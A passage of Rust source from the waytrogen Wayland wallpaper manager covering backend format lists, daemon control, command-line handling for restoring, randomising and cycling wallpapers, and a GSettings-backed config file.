fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { MpvPaperPauseModes::None => write!(f, "none"), MpvPaperPauseModes::AutoPause => write!(f, "auto-pause"), MpvPaperPauseModes::AutoStop => write!(f, "auto-stop"), } } } impl WallpaperChanger for WallpaperChangers { fn change(self, image: PathBuf, monitor: String) { Self::kill_all_changers_except(&self); thread::spawn(move || match self { Self::Hyprpaper => { change_hyprpaper_wallpaper(&image, &monitor); } Self::Swaybg(_, _) => { change_swaybg_wallpaper(self, &image, &monitor); } Self::MpvPaper(_, _, _) => { change_mpvpaper_wallpaper(&self, image, &monitor); } Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => { change_swww_wallpaper(self, image, monitor); } }); } fn accepted_formats(&self) -> Vec<String> { match self { Self::Hyprpaper => { vec![ "png".to_owned(), "jpg".to_owned(), "jpeg".to_owned(), "webp".to_owned(), "jxl".to_owned(), ] } Self::Swaybg(_, _) => vec![ "png".to_owned(), "jpg".to_owned(), "jpeg".to_owned(), "tiff".to_owned(), "tif".to_owned(), "tga".to_owned(), "gif".to_owned(), ], Self::MpvPaper(_, _, _) => { let mut mpvpaper_formats = vec![ "str".to_owned(), "aa".to_owned(), "aac".to_owned(), "aax".to_owned(), "ac3".to_owned(), "ac4".to_owned(), "acm".to_owned(), "adf".to_owned(), "adp".to_owned(), "dtk".to_owned(), "ads".to_owned(), "ss2".to_owned(), "adx".to_owned(), "aea".to_owned(), "afc".to_owned(), "aix".to_owned(), "al".to_owned(), "apc".to_owned(), "ape".to_owned(), "apl".to_owned(), "mac".to_owned(), "aptx".to_owned(), "aptxhd".to_owned(), "aqt".to_owned(), "ast".to_owned(), "obu".to_owned(), "avi".to_owned(), "avs".to_owned(), "avr".to_owned(), "avs".to_owned(), "avs2".to_owned(), "avs3".to_owned(), "bfstm".to_owned(), "bcstm".to_owned(), "binka".to_owned(), "bit".to_owned(), "bitpacked".to_owned(), "bmv".to_owned(), "bonk".to_owned(), "brstm".to_owned(), "avs".to_owned(), "cdg".to_owned(), "cdxl".to_owned(), "xl".to_owned(), "c2".to_owned(), "302".to_owned(), "daud".to_owned(), "str".to_owned(), "adp".to_owned(), "dfpwm".to_owned(), "dav".to_owned(), "dss".to_owned(), "dts".to_owned(), "dtshd".to_owned(), "dv".to_owned(), "dif".to_owned(), "cdata".to_owned(), "eac3".to_owned(), "ec3".to_owned(), "paf".to_owned(), "fap".to_owned(), "evc".to_owned(), "flm".to_owned(), "flac".to_owned(), "flv".to_owned(), "fsb".to_owned(), "fwse".to_owned(), "g722".to_owned(), "722".to_owned(), "tco".to_owned(), "rco".to_owned(), "g723_1".to_owned(), "g729".to_owned(), "genh".to_owned(), "gif".to_owned(), "gsm".to_owned(), "h261".to_owned(), "h26l".to_owned(), "h264".to_owned(), "264".to_owned(), "avc".to_owned(), "hca".to_owned(), "hevc".to_owned(), "h265".to_owned(), "265".to_owned(), "iamf".to_owned(), "idf".to_owned(), "ifv".to_owned(), "cgi".to_owned(), "ipu".to_owned(), "sf".to_owned(), "ircam".to_owned(), "ivr".to_owned(), "jxl".to_owned(), "kux".to_owned(), "laf".to_owned(), "lc3".to_owned(), "669".to_owned(), "abc".to_owned(), "amf".to_owned(), "ams".to_owned(), "dbm".to_owned(), "dmf".to_owned(), "dsm".to_owned(), "far".to_owned(), "it".to_owned(), "mdl".to_owned(), "med".to_owned(), "mid".to_owned(), "mod".to_owned(), "mt2".to_owned(), "mtm".to_owned(), "okt".to_owned(), "psm".to_owned(), "ptm".to_owned(), "s3m".to_owned(), "stm".to_owned(), "ult".to_owned(), "umx".to_owned(), "xm".to_owned(), "itgz".to_owned(), "itr".to_owned(), "itz".to_owned(), "mdgz".to_owned(), "mdr".to_owned(), "mdz".to_owned(), "s3gz".to_owned(), "s3r".to_owned(), "s3z".to_owned(), "xmgz".to_owned(), "xmr".to_owned(), "xmz".to_owned(), "669".to_owned(), "amf".to_owned(), "ams".to_owned(), "dbm".to_owned(), "digi".to_owned(), "dmf".to_owned(), "dsm".to_owned(), "dtm".to_owned(), "far".to_owned(), "gdm".to_owned(), "ice".to_owned(), "imf".to_owned(), "it".to_owned(), "j2b".to_owned(), "m15".to_owned(), "mdl".to_owned(), "med".to_owned(), "mmcmp".to_owned(), "mms".to_owned(), "mo3".to_owned(), "mod".to_owned(), "mptm".to_owned(), "mt2".to_owned(), "mtm".to_owned(), "nst".to_owned(), "okt".to_owned(), "plm".to_owned(), "ppm".to_owned(), "psm".to_owned(), "pt36".to_owned(), "ptm".to_owned(), "s3m".to_owned(), "sfx".to_owned(), "sfx2".to_owned(), "st26".to_owned(), "stk".to_owned(), "stm".to_owned(), "stp".to_owned(), "ult".to_owned(), "umx".to_owned(), "wow".to_owned(), "xm".to_owned(), "xpk".to_owned(), "flv".to_owned(), "dat".to_owned(), "lvf".to_owned(), "m4v".to_owned(), "mkv".to_owned(), "mk3d".to_owned(), "mka".to_owned(), "mks".to_owned(), "webm".to_owned(), "mca".to_owned(), "mcc".to_owned(), "mjpg".to_owned(), "mjpeg".to_owned(), "mpo".to_owned(), "j2k".to_owned(), "mlp".to_owned(), "mods".to_owned(), "moflex".to_owned(), "mov".to_owned(), "mp4".to_owned(), "m4a".to_owned(), "3gp".to_owned(), "3g2".to_owned(), "mj2".to_owned(), "psp".to_owned(), "m4b".to_owned(), "ism".to_owned(), "ismv".to_owned(), "isma".to_owned(), "f4v".to_owned(), "avif".to_owned(), "heic".to_owned(), "heif".to_owned(), "mp2".to_owned(), "mp3".to_owned(), "m2a".to_owned(), "mpa".to_owned(), "mpc".to_owned(), "mjpg".to_owned(), "txt".to_owned(), "mpl2".to_owned(), "sub".to_owned(), "msf".to_owned(), "mtaf".to_owned(), "ul".to_owned(), "musx".to_owned(), "mvi".to_owned(), "mxg".to_owned(), "v".to_owned(), "nist".to_owned(), "sph".to_owned(), "nsp".to_owned(), "nut".to_owned(), "obu".to_owned(), "ogg".to_owned(), "oma".to_owned(), "omg".to_owned(), "aa3".to_owned(), "osq".to_owned(), "pdv".to_owned(), "pjs".to_owned(), "pvf".to_owned(), "qoa".to_owned(), "yuv".to_owned(), "cif".to_owned(), "qcif".to_owned(), "rgb".to_owned(), "rt".to_owned(), "rsd".to_owned(), "rka".to_owned(), "rsd".to_owned(), "rso".to_owned(), "sw".to_owned(), "sb".to_owned(), "smi".to_owned(), "sami".to_owned(), "sbc".to_owned(), "msbc".to_owned(), "sbg".to_owned(), "scc".to_owned(), "sdns".to_owned(), "sdr2".to_owned(), "sds".to_owned(), "sdx".to_owned(), "ser".to_owned(), "sga".to_owned(), "shn".to_owned(), "vb".to_owned(), "son".to_owned(), "imx".to_owned(), "sln".to_owned(), "mjpg".to_owned(), "stl".to_owned(), "sub".to_owned(), "sub".to_owned(), "sup".to_owned(), "svag".to_owned(), "svs".to_owned(), "tak".to_owned(), "thd".to_owned(), "tta".to_owned(), "ans".to_owned(), "art".to_owned(), "asc".to_owned(), "diz".to_owned(), "ice".to_owned(), "nfo".to_owned(), "txt".to_owned(), "vt".to_owned(), "ty".to_owned(), "ty+".to_owned(), "uw".to_owned(), "ub".to_owned(), "usm".to_owned(), "v210".to_owned(), "yuv10".to_owned(), "vag".to_owned(), "vc1".to_owned(), "rcv".to_owned(), "viv".to_owned(), "idx".to_owned(), "vpk".to_owned(), "txt".to_owned(), "vqf".to_owned(), "vql".to_owned(), "vqe".to_owned(), "h266".to_owned(), "266".to_owned(), "vvc".to_owned(), "way".to_owned(), "wa".to_owned(), "vtt".to_owned(), "wsd".to_owned(), "xmd".to_owned(), "xmv".to_owned(), "xvag".to_owned(), "yop".to_owned(), "y4m".to_owned(), ]; let mut hyprpaper_formats = Self::Hyprpaper.accepted_formats(); let mut swaybg_formats = Self::Swaybg(SwaybgModes::Fill, "FFFFFF".to_owned()).accepted_formats(); mpvpaper_formats.append(&mut hyprpaper_formats); mpvpaper_formats.append(&mut swaybg_formats); mpvpaper_formats } Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => { vec![ "gif".to_owned(), "jpeg".to_owned(), "jpg".to_owned(), "png".to_owned(), "pnm".to_owned(), "tga".to_owned(), "tiff".to_owned(), "webp".to_owned(), "bmp".to_owned(), "farbfeld".to_owned(), ] } } } fn kill(&self) { match self { Self::Hyprpaper => Command::new("pkill") .arg("-9") .arg("hyprpaper") .spawn() .unwrap() .wait() .unwrap(), Self::Swaybg(_, _) => Command::new("pkill") .arg("-9") .arg("swaybg") .spawn() .unwrap() .wait() .unwrap(), Self::MpvPaper(_, _, _) => Command::new("pkill") .arg("mpvpaper") .spawn() .unwrap() .wait() .unwrap(), Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => Command::new("pkill") .arg("-9") .arg("swww-daemon") .spawn() .unwrap() .wait() .unwrap(), }; } } lazy_static! { static ref swaybg_regex: Regex = Regex::new(r"swaybg (stretch|fit|fill||center|tile|solid_color) [0-9a-f]{6}").unwrap(); } impl Display for WallpaperChangers { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::Hyprpaper => write!(f, "hyprpaper"), Self::Swaybg(_, _) => write!(f, "swaybg"), Self::MpvPaper(_, _, _) => write!(f, "mpvpaper"), Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => write!(f, "swww"), } } } pub fn get_available_wallpaper_changers() -> Vec<WallpaperChangers> { let mut available_changers = vec![]; for changer in WallpaperChangers::iter() { match changer { WallpaperChangers::Hyprpaper => match which( WallpaperChangers::Hyprpaper .to_string() .to_ascii_uppercase(), ) { Ok(_) => available_changers.push(changer), Err(_) => { if Command::new("systemctl") .arg("--user") .arg("list-unit-files") .arg("hyprpaper.service") .spawn() .unwrap() .wait() .unwrap() .success() { available_changers.push(changer); } } }, WallpaperChangers::Swaybg(_, _) => { append_changer_if_in_path(&mut available_changers, changer) } WallpaperChangers::MpvPaper(_, _, _) => { append_changer_if_in_path(&mut available_changers, changer) } WallpaperChangers::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => { append_changer_if_in_path(&mut available_changers, changer) } } } available_changers } fn append_changer_if_in_path( available_changers: &mut Vec<WallpaperChangers>, changer: WallpaperChangers, ) { if which(changer.to_string().to_lowercase()).is_ok() { available_changers.push(changer); } }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/cli.rs
src/cli.rs
use crate::{ common::{ parse_executable_script, sort_by_sort_dropdown_string, Wallpaper, APP_ID, APP_VERSION, CACHE_FILE_NAME, CONFIG_APP_NAME, GETTEXT_DOMAIN, }, main_window::build_ui, ui_common::{gschema_string_to_string, string_to_gschema_string, SORT_DROPDOWN_STRINGS}, wallpaper_changers::{WallpaperChanger, WallpaperChangers}, }; use clap::Parser; use gettextrs::{bind_textdomain_codeset, bindtextdomain, getters, gettext, textdomain}; use gtk::{gio::Settings, glib, prelude::*, Application}; use log::debug; use rand::Rng; use std::{ env::current_exe, fs::{remove_file, File}, io::{BufRead, BufReader}, path::{Path, PathBuf}, thread, time::Duration, }; use log::{error, warn}; #[must_use] pub fn restore_wallpapers() -> glib::ExitCode { let settings = Settings::new(APP_ID); WallpaperChangers::killall_changers(); let previous_wallpapers = serde_json::from_str::<Vec<Wallpaper>>(&gschema_string_to_string( settings.string("saved-wallpapers").as_ref(), )) .unwrap(); for wallpaper in previous_wallpapers { debug!("Restoring: {:?}", wallpaper); wallpaper.clone().changer.change( PathBuf::from(wallpaper.clone().path), wallpaper.clone().monitor, ); match wallpaper.clone().changer { WallpaperChangers::Hyprpaper => { thread::sleep(Duration::from_millis(1000)); } WallpaperChangers::Swaybg(_, _) | WallpaperChangers::MpvPaper(_, _, _) | WallpaperChangers::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => {} } } glib::ExitCode::SUCCESS } #[must_use] pub fn print_wallpaper_state() -> glib::ExitCode { let settings = Settings::new(APP_ID); println!( "{}", gschema_string_to_string(&settings.string("saved-wallpapers")) ); glib::ExitCode::SUCCESS } fn get_previous_wallpapers(settings: &Settings) -> Vec<Wallpaper> { let previous_wallpapers = serde_json::from_str::<Vec<Wallpaper>>(&gschema_string_to_string( settings.string("saved-wallpapers").as_ref(), )) .unwrap(); previous_wallpapers } fn get_previous_supported_wallpapers(settings: &Settings) -> Vec<PathBuf> { let previous_wallpapers = get_previous_wallpapers(settings); let wallpaper = previous_wallpapers[0].clone(); let path = Path::new(&wallpaper.path) .parent() .unwrap_or_else(|| Path::new("")); let files = walkdir::WalkDir::new(path) .follow_links(true) .follow_root_links(true) .into_iter() .filter_map(std::result::Result::ok) .filter(|f| f.file_type().is_file()) .map(|d| d.path().to_path_buf()) .filter(|p| { previous_wallpapers .iter() .map(|w| w.changer.clone()) .all(|c| { c.accepted_formats().iter().any(|f| { f == p .extension() .unwrap_or_default() .to_str() .unwrap_or_default() }) }) }) .collect::<Vec<_>>(); files } #[must_use] pub fn set_random_wallpapers() -> glib::ExitCode { let settings = Settings::new(APP_ID); let mut previous_wallpapers = get_previous_wallpapers(&settings); let files = get_previous_supported_wallpapers(&settings); WallpaperChangers::killall_changers(); for w in &mut previous_wallpapers { let mut rng = rand::thread_rng(); let index = rng.gen_range(0..files.len()); log::debug!("{index}"); w.changer .clone() .change(files[index].clone(), w.monitor.clone()); w.path = files[index].clone().to_str().unwrap_or_default().to_owned(); } match settings.set_string( "saved-wallpapers", &string_to_gschema_string(&serde_json::to_string(&previous_wallpapers).unwrap_or_default()), ) { Ok(_) => {} Err(e) => { error!("{} {e}", gettext("Unable to save \"next\" wallpapers")); } } glib::ExitCode::SUCCESS } #[must_use] pub fn print_app_version() -> glib::ExitCode { println!("{APP_VERSION}"); glib::ExitCode::SUCCESS } #[must_use] pub fn cycle_next_wallpaper(args: &Cli) -> glib::ExitCode { let settings = Settings::new(APP_ID); let mut previous_wallpapers = get_previous_wallpapers(&settings); let sort_dropdown_string = SORT_DROPDOWN_STRINGS[settings.uint("sort-by") as usize]; let mut files = get_previous_supported_wallpapers(&settings); let invert_sort_state = settings.boolean("invert-sort"); sort_by_sort_dropdown_string(&mut files, sort_dropdown_string, invert_sort_state); if args.next.clone().unwrap_or_default() == "All" { for previous_wallpaper in &mut previous_wallpapers { let wallpaper_index = files.iter().position(|p| { p.clone() == previous_wallpaper .path .parse::<PathBuf>() .unwrap_or_default() }); try_set_next_wallpaper(&files, wallpaper_index, previous_wallpaper); } } else { let previous_wallpaper = previous_wallpapers .iter() .find(|w| *w.monitor == args.next.clone().unwrap_or_default()); if previous_wallpaper.is_none() { error!( "Display \"{}\" does not exist.", args.next.clone().unwrap_or_default() ); return glib::ExitCode::FAILURE; } let mut previous_wallpaper = previous_wallpaper.unwrap().clone(); try_set_next_wallpaper( &files, files.iter().position(|f| { *f == previous_wallpaper .path .parse::<PathBuf>() .unwrap_or_default() }), &mut previous_wallpaper, ); let index = previous_wallpapers .iter() .position(|w| w.monitor == previous_wallpaper.monitor) .unwrap(); previous_wallpapers[index] = previous_wallpaper; } match settings.set_string( "saved-wallpapers", &string_to_gschema_string(&serde_json::to_string(&previous_wallpapers).unwrap_or_default()), ) { Ok(_) => {} Err(e) => { error!("{} {e}", gettext("Unable to save \"next\" wallpapers")); } } glib::ExitCode::SUCCESS } fn try_set_next_wallpaper( files: &[PathBuf], position: Option<usize>, previous_wallpaper: &mut Wallpaper, ) { if let Some(i) = position { let path = &files[(i + 1) % files.len()]; previous_wallpaper .changer .clone() .change(path.clone(), previous_wallpaper.monitor.clone()); previous_wallpaper.path = path.to_str().unwrap_or_default().to_owned(); } else { warn!( "Wallpaper {} could not be found. Using first wallpaper", previous_wallpaper .path .parse::<PathBuf>() .unwrap_or_default() .display() ); match files.first() { Some(p) => { previous_wallpaper .changer .clone() .change(p.clone(), previous_wallpaper.monitor.clone()); previous_wallpaper.path = p.to_str().unwrap_or_default().to_owned(); } None => { error!("Wallpaper directory is empty. Please set a wallpaper folder before using --next."); } } } } pub fn delete_image_cache() -> glib::ExitCode { let xdg_dirs = xdg::BaseDirectories::with_prefix(CONFIG_APP_NAME); if xdg_dirs.is_err() { error!( "Failed to get XDG base dirrectory, {}", xdg_dirs.err().unwrap() ); return glib::ExitCode::FAILURE; } let xdg_dirs = xdg_dirs.unwrap(); let cache_path = xdg_dirs.place_cache_file(CACHE_FILE_NAME); if cache_path.is_err() { error!("Failed to get cache path, {}", cache_path.err().unwrap()); return glib::ExitCode::FAILURE; } match remove_file(cache_path.unwrap()) { Ok(_) => glib::ExitCode::SUCCESS, Err(e) => { error!("Failed to delete cache {e}"); glib::ExitCode::FAILURE } } } #[must_use] pub fn launch_application(args: Cli) -> glib::ExitCode { let app = Application::builder().application_id(APP_ID).build(); textdomain("waytrogen").unwrap(); bind_textdomain_codeset("waytrogen", "UTF-8").unwrap(); let os_id = get_os_id().unwrap().unwrap_or_default(); let domain_directory = match os_id.as_str() { "nixos" => { #[cfg(feature = "nixos")] // the path is known at compile time when using nix to build waytrogen { let path = env!("OUT_PATH").parse::<PathBuf>().unwrap(); path.join("share").join("locale") } #[cfg(not(feature = "nixos"))] { let exe_path = current_exe().unwrap(); exe_path .parent() .unwrap() .parent() .unwrap() .parent() .unwrap() .join("share") .join("locale") } } _ => getters::domain_directory(GETTEXT_DOMAIN).unwrap(), }; bindtextdomain(GETTEXT_DOMAIN, domain_directory).unwrap(); app.connect_activate(move |app| { build_ui(app, &args); }); let empty: Vec<String> = vec![]; // Run the application app.run_with_args(&empty) } /// os id is the ID="nixos" parameter in `/etc/os-release` /// If ID parameter is not found this returns None fn get_os_id() -> anyhow::Result<Option<String>> { let file = File::open("/etc/os-release")?; let reader = BufReader::new(file); for line in reader.lines() { let line = line?; if let Some(s) = line.strip_prefix("ID=") { let id = s.trim_matches('"'); return Ok(Some(id.to_string())); } } Ok(None) } #[derive(Parser, Clone)] pub struct Cli { #[arg(short, long)] /// Restore previously set wallpapers. pub restore: bool, #[arg(long, default_value_t = 0)] /// How many error, warning, info, debug or trace logs will be shown. 0 for error, 1 for warning, 2 for info, 3 for debug, 4 or higher for trace. pub log_level: u8, #[arg(short, long, default_value_t = false)] /// Get the current wallpaper settings in JSON format. pub list_current_wallpapers: bool, #[arg(short, long, value_parser = parse_executable_script)] /// Path to external script. pub external_script: Option<String>, #[arg(long)] /// Set random wallpapers based on last set changer. pub random: bool, #[arg(short, long)] /// Get application version. pub version: bool, #[arg(short, long)] /// Cycle wallaper(s) the next on based on the previously set wallpaper(s) and sort settings on a given monitor. "All" cycles wallpapers on all monitors. pub next: Option<String>, #[arg(short, long, default_value_t = 0)] /// Startup delay to allow monitors to initialize. pub startup_delay: u64, #[arg(short, long)] /// Delete image cache. pub delete_cache: bool, #[arg(short, long)] /// Hide bottom bar pub hide_bottom_bar: Option<bool>, }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/dotfile.rs
src/dotfile.rs
use crate::common::{ get_config_file_path, parse_executable_script, Wallpaper, APP_ID, }; use anyhow::anyhow; use gettextrs::gettext; use log::{error, trace, warn}; use serde::{Deserialize, Serialize}; use std::{ fs::{remove_file, OpenOptions}, io::{Read, Write}, }; use gtk::{gio::Settings, prelude::*}; #[derive(Clone, Serialize, Deserialize)] pub struct ConfigFile { executable_script_doc: String, pub executable_script: String, wallpaper_folder_doc: String, pub wallpaper_folder: String, saved_wallpapers_doc: String, pub saved_wallpapers: Vec<Wallpaper>, monitor_doc: String, pub monitor: u32, sort_by_doc: String, pub sort_by: u32, invert_sort_doc: String, pub invert_sort: bool, changer_doc: String, pub changer: u32, image_filter_doc: String, pub image_filter: String, swaybg_mode_doc: String, pub swaybg_mode: u32, swaybg_color_doc: String, pub swaybg_color: String, mpvpaper_pause_option_doc: String, pub mpvpaper_pause_option: u32, mpvpaper_slideshow_enable_doc: String, pub mpvpaper_slideshow_enable: bool, mpvpaper_slideshow_interval_doc: String, pub mpvpaper_slideshow_interval: f64, mpvpaper_additional_options_doc: String, pub mpvpaper_additional_options: String, selected_monitor_item_doc: String, pub selected_monitor_item: String, swww_resize_doc: String, pub swww_resize: u32, swww_fill_color_doc: String, pub swww_fill_color: String, swww_scaling_filter_doc: String, pub swww_scaling_filter: u32, swww_transition_type_doc: String, pub swww_transition_type: u32, swww_transition_step_doc: String, pub swww_transition_step: f64, swww_transition_duration_doc: String, pub swww_transition_duration: f64, swww_transition_angle_doc: String, pub swww_transition_angle: f64, swww_transition_position_doc: String, pub swww_transition_position: String, swww_invert_y_doc: String, pub swww_invert_y: bool, swww_transition_wave_width_doc: String, pub swww_transition_wave_width: f64, swww_transition_wave_height_doc: String, pub swww_transition_wave_height: f64, swww_transition_bezier_p0_doc: String, pub swww_transition_bezier_p0: f64, swww_transition_bezier_p1_doc: String, pub swww_transition_bezier_p1: f64, swww_transition_bezier_p2_doc: String, pub swww_transition_bezier_p2: f64, swww_transition_bezier_p3_doc: String, pub swww_transition_bezier_p3: f64, swww_transition_fps_doc: String, pub swww_transition_fps: u32, hide_changer_options_box_doc: String, pub hide_changer_options_box: bool } impl Default for ConfigFile { fn default() -> Self { Self{ executable_script_doc: gettext("The path to executable script used after a wallpaper is set. The script is sent the monitor identifier, wallpaper path and the serialized saved_wallpapers state."), executable_script: String::default(), wallpaper_folder_doc: gettext("The path to the currently selected wallpaper folder. Note: The path cannot have a trailing forward slash."), wallpaper_folder: String::default(), saved_wallpapers_doc: gettext("The collection of the currently saved wallpapers with their corresponding monitor, path and changer."), saved_wallpapers: vec![Wallpaper::default()], monitor_doc: gettext("The internal numeric identifier in the monitor dropdown used by dconf for the currently selected monitor. Do not change unless you know what you are doing."), monitor: u32::default(), sort_by_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected sorting option. Do not change unless you know what you are doing."), sort_by: u32::default(), invert_sort_doc: gettext("The boolean flag to invert the currently selected sort-by option in the sort dropdown used by dconf."), invert_sort: bool::default(), changer_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected changer. Do not change unless you know what you are doing."), changer: u32::default(), image_filter_doc: gettext("The search string for the wallpapers."), image_filter: String::default(), swaybg_mode_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected swaybg mode. Do not change unless you know what you are doing."), swaybg_mode: u32::default(), swaybg_color_doc: gettext("The hex color for swaybg background fill. Must be six characters long."), swaybg_color: String::from("000000"), mpvpaper_pause_option_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected mpvpaper pause option. Do not change unless you know what you are doing."), mpvpaper_pause_option: u32::default(), mpvpaper_slideshow_enable_doc: gettext("The boolean flag to enable/disable slideshows for mpvpaper used by dconf."), mpvpaper_slideshow_enable: bool::default(), mpvpaper_slideshow_interval_doc: gettext("The number of seconds of that mpvpaper takes between switching images in slideshow mode. Note: The option must be a positive floating point number."), mpvpaper_slideshow_interval: f64::default(), mpvpaper_additional_options_doc: gettext("Custom options for mpvpaper passed as command line arguments."), mpvpaper_additional_options: String::default(), selected_monitor_item_doc: gettext("The currently selected monitor as a string. Note: The name must coincide with the monitor numeric identifier."), selected_monitor_item: String::default(), swww_resize_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected swww resize option. Do not change unless you know what you are doing."), swww_resize: u32::default(), swww_fill_color_doc: gettext("The hex color for swww background fill. Must be six characters long."), swww_fill_color: String::from("000000"), swww_scaling_filter_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected swww scaling filter option. Do not change unless you know what you are doing."), swww_scaling_filter: u32::default(), swww_transition_type_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected swww transition type option. Do not change unless you know what you are doing."), swww_transition_type: 1, swww_transition_step_doc: gettext("How fast the transition approaches the new image used by swww."), swww_transition_step: 90.0, swww_transition_duration_doc: gettext("How long the transition takes to complete in seconds used by swww."), swww_transition_duration: 3.0, swww_transition_angle_doc: gettext("Used for the 'wipe' and 'wave' transitions used by swww. It controls the angle of the wipe."), swww_transition_angle: 45.0, swww_transition_position_doc: gettext("This is only used for the 'grow','outer' transitions used by swww. It controls the center of circle."), swww_transition_position: String::from("center"), swww_invert_y_doc: gettext("Inverts the y position sent in 'transition_pos' flag used by swww."), swww_invert_y: bool::default(), swww_transition_wave_width_doc: gettext("Currently only used for 'wave' transition to control the width of each wave used by swww."), swww_transition_wave_width: 200.0, swww_transition_wave_height_doc: gettext("Currently only used for 'wave' transition to control the height of each wave used by swww."), swww_transition_wave_height: 200.0, swww_transition_bezier_p0_doc: gettext("Point 0 for the Bezier curve to use for the transition"), swww_transition_bezier_p0: 0.54, swww_transition_bezier_p1_doc: gettext("Point 1 for the Bezier curve to use for the transition"), swww_transition_bezier_p1: 0.0, swww_transition_bezier_p2_doc: gettext("Point 2 for the Bezier curve to use for the transition"), swww_transition_bezier_p2: 0.34, swww_transition_bezier_p3_doc: gettext("Point 3 for the Bezier curve to use for the transition"), swww_transition_bezier_p3: 0.99, swww_transition_fps_doc: gettext("Frame rate for the transition effect used by swww."), swww_transition_fps: 30, hide_changer_options_box_doc: gettext("Hide bottom bar."), hide_changer_options_box: false } } } impl ConfigFile { pub fn write_to_config_file(&self) -> anyhow::Result<()> { let config_file = get_config_file_path()?; let config_contents = serde_json::to_string_pretty(&self)?; let mut config_file = OpenOptions::new() .write(true) .truncate(true) .create(true) .open(&config_file)?; config_file.write_all(config_contents.as_bytes())?; Ok(()) } pub fn from_gsettings() -> anyhow::Result<Self> { let settings = Settings::new(APP_ID); let executable_script = get_config_file()?.executable_script; trace!("Getting wallpaper-folder gsetting"); let wallpaper_folder = settings.string("wallpaper-folder").to_string(); trace!("Getting saved-wallpapers gsetting"); let saved_wallpapers: Vec<Wallpaper> = serde_json::from_str( &settings .string("saved-wallpapers") .to_string() .replace(r"\", ""), )?; trace!("Getting monitor gsetting"); let monitor = settings.uint("monitor"); trace!("Getting sort-by gsetting"); let sort_by = settings.uint("sort-by"); trace!("Getting invert-sort gsetting"); let invert_sort = settings.boolean("invert-sort"); trace!("Getting changer gsetting"); let changer = settings.uint("changer"); trace!("Getting image-filter gsetting"); let image_filter = settings.string("image-filter").to_string(); trace!("Getting swaybg-mode gsetting"); let swaybg_mode = settings.uint("swaybg-mode"); trace!("Getting swaybg-color gsetting"); let swaybg_color = settings.string("swaybg-color").to_string(); trace!("Getting mpvpaper-pause-option gsetting"); let mpvpaper_pause_option = settings.uint("mpvpaper-pause-option"); trace!("Getting mpvpaper-slideshow-enable gsetting"); let mpvpaper_slideshow_enable = settings.boolean("mpvpaper-slideshow-enable"); trace!("Getting mpvpaper-slideshow-interval gsetting"); let mpvpaper_slideshow_interval = settings.double("mpvpaper-slideshow-interval"); trace!("Getting mpvpaper-additional-options gsetting"); let mpvpaper_additional_options = settings.string("mpvpaper-additional-options").to_string(); trace!("Getting selected-monitor-item gsetting"); let selected_monitor_item = settings.string("selected-monitor-item").to_string(); trace!("Getting swww-resize gsetting"); let swww_resize = settings.uint("swww-resize"); trace!("Getting swww-fill-color gsetting"); let swww_fill_color = settings.string("swww-fill-color").to_string(); trace!("Getting swww-scaling-filter gsetting"); let swww_scaling_filter = settings.uint("swww-scaling-filter"); trace!("Getting swww-transition-type gsetting"); let swww_transition_type = settings.uint("swww-transition-type"); trace!("Getting swww-transition-step gsetting"); let swww_transition_step = settings.double("swww-transition-step"); trace!("Getting swww-transition-duration gsetting"); let swww_transition_duration = settings.double("swww-transition-duration"); trace!("Getting swww-transition-angle gsetting"); let swww_transition_angle = settings.double("swww-transition-angle"); trace!("Getting swww-transition-position gsetting"); let swww_transition_position = settings.string("swww-transition-position").to_string(); trace!("Getting swww-invert-y gsetting"); let swww_invert_y = settings.boolean("swww-invert-y"); trace!("Getting swww-transition-wave-width gsetting"); let swww_transition_wave_width = settings.double("swww-transition-wave-width"); trace!("Getting swww-transition-wave-height gsetting"); let swww_transition_wave_height = settings.double("swww-transition-wave-height"); trace!("Getting swww-transition-bezier-p0 gsetting"); let swww_transition_bezier_p0 = settings.double("swww-transition-bezier-p0"); trace!("Getting swww-transition-bezier-p1 gsetting"); let swww_transition_bezier_p1 = settings.double("swww-transition-bezier-p1"); trace!("Getting swww-transition-bezier-p2 gsetting"); let swww_transition_bezier_p2 = settings.double("swww-transition-bezier-p2"); trace!("Getting swww-transition-bezier-p3 gsetting"); let swww_transition_bezier_p3 = settings.double("swww-transition-bezier-p3"); trace!("Getting swww-transition-fps gsetting"); let swww_transition_fps = settings.uint("swww-transition-fps"); trace!("Getting hide-changer-options-box gsetting"); let hide_changer_options_box = settings.boolean("hide-changer-options-box"); Ok(Self { executable_script, wallpaper_folder, saved_wallpapers, monitor, sort_by, invert_sort, changer, image_filter, swaybg_mode, swaybg_color, mpvpaper_pause_option, mpvpaper_slideshow_enable, mpvpaper_slideshow_interval, mpvpaper_additional_options, selected_monitor_item, swww_resize, swww_fill_color, swww_scaling_filter, swww_transition_type, swww_transition_step, swww_transition_duration, swww_transition_angle, swww_transition_position, swww_invert_y, swww_transition_wave_width, swww_transition_wave_height, swww_transition_bezier_p0, swww_transition_bezier_p1, swww_transition_bezier_p2, swww_transition_bezier_p3, swww_transition_fps, hide_changer_options_box, ..Default::default() }) } pub fn write_to_gsettings(&self) -> anyhow::Result<()> { let settings = Settings::new(APP_ID); settings.set_string("wallpaper-folder", &self.wallpaper_folder)?; settings.set_string( "saved-wallpapers", &serde_json::to_string_pretty(&self.saved_wallpapers)?, )?; 